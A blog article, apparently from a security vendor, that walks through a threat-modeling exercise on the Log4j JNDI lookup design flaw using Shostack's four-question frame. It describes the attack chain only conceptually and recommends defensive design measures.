Scroll to discover
Watch a Demo
Skip to content

Threat modeling as a way of thinking about design flaws - Log4j case

What is this article about?

Many development, security, and operations teams have spent the past few months fighting one of the most important security threats since the Shellshock vulnerability was discovered in 2014. Thanks to the hard work of Log4j maintainers, who have been working tirelessly and for free on mitigation measures, fixed versions of the popular Java library were released only a few days after the Alibaba Security group reported the security flaw. 

Much has been written about how to defend your organization against this specific flaw. For example, the CISA Apache Log4j Vulnerability Guidance and the Microsoft Guidance for preventing, detecting, and hunting for exploitation of the Log4j2 vulnerability, to mention a few. In this article we’d like to explore some lessons learnt regarding how we all can improve collaboration in our SDLC workflows to avoid similar flaws at design time in the future.

Not all the security defects are created the same way

Software security defects can be classified in two broad categories: bugs in the implementation and flaws in the design. As Gary McGraw explains in Software Security: Building Security In, architectural or design flaws are harder to change or fix, and they take training and help to understand. Coding or implementation bugs are easier to spot using scanning tools and reviews. That’s why the IEEE Computer Society formed the Center for Secure Design (CSD) in 2014. The first document created by this center was called Avoiding the Top 10 Software Security Design Flaws and was intended to shift some of the industry’s focus on design flaws (roughly,  50 percent of security problems are the result of design flaws). 

Last year, this focus on identifying common design flaws reached the well known 2021 OWASP Top 10 document with the new Insecure Design category:

There is a difference between insecure design and insecure implementation. We differentiate between design flaws and implementation defects for a reason, they have different root causes and remediation. A secure design can still have implementation defects leading to vulnerabilities that may be exploited. An insecure design cannot be fixed by a perfect implementation as by definition, needed security controls were never created to defend against specific attacks. 

Using threat modeling to think about security

The Threat Modeling Manifesto defines threat modeling as ‘analyzing representations of a system to highlight security and privacy characteristics’. It doesn’t have to be a complex process and could be adapted to modern software workflows. Adam Shostack's 4 Question Frame for Threat Modeling summarizes the process in just four steps:

  1. What are we working on?
  2. What could go wrong?
  3. What are we going to do about it?
  4. Did we do a good job?

We’ll try to use these four questions to guide us during a threat modeling exercise based on the Log4j case during the following sections.

Step 1. What are we working on?

Following the first step in Adam Shostacks framework, we can start by taking a trip back in time to the year 2013. At that time, a new feature request was submitted to log4j maintainers to add support forJNDI lookups.

[#LOG4J2-313] JNDI Lookup plugin support - ASF JIRA

Taking a look at the JIRA ticket description, we can start our threat modeling exercise drawing the following simplified diagram for the software architecture of this new feature.

Step 2. What could go wrong?

Once we have a basic view of the main components involved in the requested feature, we can start digging in the second step of the threat modeling process (“what can go wrong?”) with some “what if” questions:

  • What if the log messages include JNDI lookups?
  • What if we use JNDI to connect to an external LDAP server?
  • What if the LDAP server is controlled by a third actor?
  • What if the LDAP server responds with directory information pointing to another external service under an attacker’s control?
  • What if JNDI can be used to cause remote code execution via deserialization?

Maybe those questions could have led us to think about threats and eventually we could end up creating more pervasive diagrams, to illustrate abuse cases that weren’t straight forward at the beginning of the discussion.

If somebody could control JNDI lookups, we can end up having a remote code execution vulnerability via deserialization. In this abuse case, Log4j is like a “wrapper” that allows an attacker to execute arbitrary JNDI lookups that could end up loading and executing malicious serialized classes from external servers. 

Step 3. What are we going to do about it?

These are some of the potential actions that may have arisen from the threat modeling exercise:

  • Developers expect just to log pure text messages in the majority of the cases, without needing additional magic under the hood. If we want to add some extra use cases that will be helpful for some power users (like enabling the JNDI support), it’s better to add them as optional features not enabled in the default configuration. 
  • In simple terms, your attack surface refers to all the access points that an attacker could use to compromise your application. It’s highly desirable that all the security relevant decisions that affect the application’s attack surface were explicitly written in the log4j API documentation. This way, any developer that is going to use this software component will be in a better position to make an informed decision about the trade-off between functionalities and risks.
  • Finally, if you, as a developer, have made the decision to enable the JNDI lookup support for your application logs being aware of the potential risks, you should remember to enforce data validation. This could mean to create a whitelist of the allowed LDAP servers that can be used in a JNDI lookup and to create a global deserialization filter that explicitly validates the remote Java class that could be deserializated in your application. “Applications should not perform JNDI lookups with untrusted data”. In fact, this last sentence was said in 2016 during a BlackHat 2016 presentation titled “A Journey from JNDI/LDAP Manipulation to Remote Code Execution Dream Land” by Alvaro Muñoz and Oleksandr Mirosh.

Step 4. Did we do a good job?

In this last step (like in any Agile retrospective), we should focus on continuous learning and improvement. While threat modeling is not a simple task, the alternative is being reactive and fighting in the dark without a map. Some self-assessment questions that could help in this stage:

  • Regarding the diagram. Did we miss some important components? Are trust boundaries well defined?
  • Did we find at least one threat per component in the diagram?
  • Did we find one countermeasure per identified threat?
  • Did we act on the countermeasures we found?

It’s easy (and also really unfair) to blame the log4j maintainers for not having spotted the security implications of enabling the JNDI support in default configurations. However, as Álvaro Muñoz also stated, we (as a security community) have a responsibility in not having recognized the huge impact of this threat sooner.

Modern software development is a very complex process and we should rethink how we build security into the design of our systems. As Ken Pentimonti of Paladin Capital Group argues,

“Businesses and governments need to assume that no system or piece of software is safe and they need to invest in and adapt new and incremental technologies, such as automated threat modeling solutions, that can identify devastating security flaws before the flaw is exploited and becomes a business or national security threat.” 

The disconnect between the security and development teams made it possible for this particular vulnerability to stay hidden for more than 8 years. Threat modeling is a team activity that could help to build better collaboration between security and development teams. It could be a way to start security conversations about the impact of the myriad of changes supporting today’s applications. We should remember that the main problem does not lie in carrying out incomplete threat modeling. The main risk is not threat modeling at all.